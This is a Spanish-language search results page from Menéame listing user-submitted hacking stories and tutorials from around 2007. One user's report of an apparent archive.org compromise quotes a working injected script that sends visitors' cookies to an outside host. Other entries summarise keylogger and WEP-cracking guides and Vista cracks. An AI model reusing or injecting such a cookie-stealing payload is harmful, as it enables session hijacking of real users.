edición general

encontrados: 1278, tiempo total: 0.008 segundos rss2
22 meneos
 
Este envío tiene varios votos negativos. Asegúrate antes de menear

Rompiendo redes wireless

Columna que habla de las redes inalámbricas en el hogar y cómo pueden ser vulneradas.
22 0 9 K 46
22 0 9 K 46
33 meneos
 

Bluetooth Hacking: Seguridad en teléfonos móviles

Contenidos • Introducción al estándar bluetooth • Identificación de dispositivos bluetooth • Vulnerabilidades y ataques a teléfonos móviles • Marketing de proximidad basado en bluetooth • Conclusiones
33 0 1 K 189
33 0 1 K 189
23 meneos
 
Este envío tiene varios votos negativos. Asegúrate antes de menear

Inseguridad Wireless: Hacking WEP key (troppix)

Manual básico para hackear WEP keys con Troppix (distribución Linux para "auditorias Wireless")
23 0 4 K 101
23 0 4 K 101
4 meneos
 

¿Han hackeado archive.org?

No se que le pasa a la página de archive.org primero la carga bien y luego me redirecciona a esta otra página: lcworks.122mb.com/loginarchive.php No es para que votéis la noticia, sólo para que alguien diga algo si sabe que pasa. Parece que le han hecho un injection de HTML: <script>onload=document.location="lcworks.122mb.com/pc.php?cookie="+document.cookie</script>;
4 0 8 K -24
4 0 8 K -24
265 meneos
 

Hacking definitivo: Copias HD DVD y Blu-ray Disc a gogó

En Engadget (www.engadget.com/2007/02/13/hackers-discover-hd-dvd-and-blu-ray-proces) indican que los foros de Doom9 en los que se habían logrado las claves de algunas películas en formato HD DVD y Blu-ray Disc no son nada en comparación con este descubrimiento. La llamada 'processing key' abre las puertas al desbloqueo, descifrado y realización de copia de seguridad de cualquier película en estos formatos.
265 0 0 K 847
265 0 0 K 847
9 meneos
 

Cuando Windows y Linux no dan la talla: ¿Que usar si usted no quiere hackear sino trabajar?

¿Es mejor MAC OS X mejor que Windows Vista y Linux en el escritorio? Después de 5 años pareciera que si. Linux es increible como sistema operativo del lado del servidor pero su soporte débil a cosas tan sencillas como MP3, procesadores de palabras e interfaz de usuario lo hacen dificil de usar para un neofito, mientras que Vista ha tenido una fria recepción y quizas marca el fin de una era para Microsoft. ¿Qué pasa cuando un usuario serio decide tirar la toalla?
9 0 10 K -22
9 0 10 K -22
6 meneos
 

La conocida web estrenosdivx.com, ¿hackeada?

Me dirijo tranquilamente a mi web preferida de cine, estrenosdivx.com y salta una página porno amateur. ¿Esto es hackear una web o es una nueva manera de publicidad?
6 0 7 K -16
6 0 7 K -16
5 meneos
 

Validar Windows Vista (varias formas)

Link en donde se puede descargar un archivo con varios cracks aplicables a vista, una valiosa colección :)
5 0 6 K -15
5 0 6 K -15
1 meneos
 

Whois de Google, Yahoo hackeado

Si haces 'whois yahoo.com' o 'whois google.com' el resultado te muestra una página de hackers rusos: www.web-hack.com/
1 0 13 K -110
1 0 13 K -110
60 meneos
 
Este envío tiene varios votos negativos. Asegúrate antes de menear

Google: tu visor de cámaras IP privadas

Trata de como con una simple búsqueda en google podemos acceder a miles de servidores de cámaras IP privadas la mayoría sin proteger con contraseña Muy Interesante y curioso.
60 0 22 K 271
60 0 22 K 271
22 meneos
 
Este envío tiene varios votos negativos. Asegúrate antes de menear

Tutorial: Usb-Keylogger

Este tutorial nos muestra como crear nuestro propio USB-Keylogger, asi como prevenirlos! "...Un “pendrive” que al conectarlo a nuestro querido Windows, guardara todo aquello que tecleemos sin que, por supuesto el usuario “victima” se entere...".
22 0 5 K 95
22 0 5 K 95
10 meneos
 

Coca-Cola Gratis! Como Hackear la nueva máquina de Coca-Cola.

Si quieres aprender a conseguir Cocacolas gratuitas, ésta es tu noticia. Disfrútala!
10 0 9 K -13
10 0 9 K -13
32 meneos
 

Keyloggers: Qué son y cómo detectarlos

Estos pequeños programas (a veces también en forma de dispositivos hardware) son capaces de registrar cualquier pulsación del teclado y asociarla a la aplicación que se está ejecutando sin que el usuario afectado se dé cuenta de nada. Los keyloggers son programas espía que registran contraseñas, cuentas bancarias, y otros tipos de información confidencial, y luego la envían a los que los han propagado. Qué miedito.
32 0 0 K 252
32 0 0 K 252
35 meneos
 

Apple TV: “born to be hacked”

En este post Enrique Dans nos explica porqué a Apple le interesa que sus productos sean hackeados, Casi cabe pensar que de no existir hackers, Apple tendría que inventárselos o pagarlos de su bolsillo
35 0 2 K 225
35 0 2 K 225
10 meneos
 

Hacker borra su propio disco duro

Se trata de una graciosa historia sucedida en un chat alemán en el que un supuesto megahacker se borra su propio disco duro al intentar atacar a otro chateante. No tiene desperdicio...
10 0 22 K -77
10 0 22 K -77
335 meneos
 

Hacking Ético, aprende hackeando

El Hacking Ético es como se denomina a "aprender hackeando" y no a "aprender a hackear". Con este tutorial podrás dar tus primeros pasos en el mundo del Hacking Ético realizando pequeñas prácticas con ARP, Man in the Middle, utilizando Sniffers, Google Hacking, Phishing... Además contiene un gran número de enlaces para saber como seguir avanzando con el Hacking Ético.
335 0 1 K 718
335 0 1 K 718
11 meneos
 

Reto hacking de autenticación web

Como casi no es antiguo... (lo pasé en el 2004 chinchaos :-p) os pongo un reto de autenticación web, por si os aburrís. Aquí teneis otro quizás más interesante y completo: www.izhal.com. Creo que estaban haciendo la versión 2 de izhal, pero de eso hace dos años... Si conoceis alguno ponerlo en los comentarios. Gracias de antemano.
11 0 1 K 72
11 0 1 K 72
21 meneos
 

El-hacker.com Hackeado

( Vía de-enlaces.blogspot.com/ ) Hace aproximadamente dos semanas que el señor MBYTE se hizo con la famoso web de hacking www.el-hacker.com/ . Se comenta que fue atacada al servidor directamente (Si estaba vulnerable) mediante un DNS Spoofing. Ha sido hackeada la comunidad de hacking más grande en cuanto a post, temas, users, actividad ,etc ..
21 0 2 K 112
21 0 2 K 112
11 meneos
 

Desbloquea tu móvil mediante una llamada

Acabo de leer la noticia en The Inquirer y me he quedado sorprendido. De hecho, el servicio parece funcionar con muchos más teléfonos que con los Nokia de los que hablan que han probado. ¿Alguien puede confirmar que el servicio funciona, y si se conocen alternativas en nuestro país? Vía: es.theinquirer.net/2007/04/13/desbloquea_tu_nokia_mediante_u.html
11 0 2 K 60
11 0 2 K 60
19 meneos
 

Terroristas de Sri Lanka hackean satélite

El «Frente de Liberación de los Tigres de Tamil» (LTTE) han sido acusados de usar ilegalmente satélites para transmitir radio y televisión a todo el mundo. Intelsat, que ha sido acusado anteriormente de tener lazos con Hezbollah, niega tener la culpa y afirma que las transmisiones cesarán en pocos días. Via Slashdot: it.slashdot.org/it/07/04/13/068222.shtml
19 0 0 K 148
19 0 0 K 148
7 meneos
 

Hackéate la contraseña de usuario, o la de otra persona

Aunque para hacérselo a otra persona necesitarás acceso físico al equipo y que esté encendido (digo yo) ¿quizás para putear al compañero cuando esté en el servicio? Que cada cual le dé el uso moderado y responsable que estime oportuno. Es un vídeo de metacafe, por si las dudas.
7 0 6 K 1
7 0 6 K 1
3 meneos
 

Hackeada la web del Hackmeeting?

No se qué está pasando pero ahora mismo la portada de la web del hackmeeting muestra un texto que parece un hack: "VIVOS O MUERTOS, Elena Gil Palacios, Jose Maria Castro Aguilar, Alcalde de Belorado. Mejor Muerto, Recompensa 2.000.000 de Euros, Cobro garantizado.". ¿Qué está pasando?
3 0 7 K -35
3 0 7 K -35
6 meneos
 

El Ministerio de Defensa, a través del CCN-CERT, ayuda a las administraciones públicas ante incidentes de Seguridad

El Centro Criptológico Nacional, perteneciente al Centro Nacional de Inteligencia (CNI), ha desarrollado la Capacidad de Respuesta ante Incidentes de Seguridad de la Información (CCN-CERT). Su objetivo es ayudar a todas las Administraciones Públicas (estatal, autonómica y local) a responder ante cualquier ataque de forma rápida y eficiente.
19 meneos
 

¿SQL Injection en la página de la Nasa?

Inyección SQL es una vulnerabilidad informática en el nivel de base de datos de una aplicación: es.wikipedia.org/wiki/Inyección_SQL Al parecer la nasa tiene una , en una de sus páginas.
19 0 3 K 102
19 0 3 K 102
11 meneos
 

Cómo mantener segura tu red wifi

En dos minutos un hacker competente puede conseguir las contraseñas de la mayor parte de las redes wifi domésticas. El artículo –en inglés– sugiere formas de mejorar la seguridad de este tipo de redes.
11 0 0 K 72
11 0 0 K 72

menéame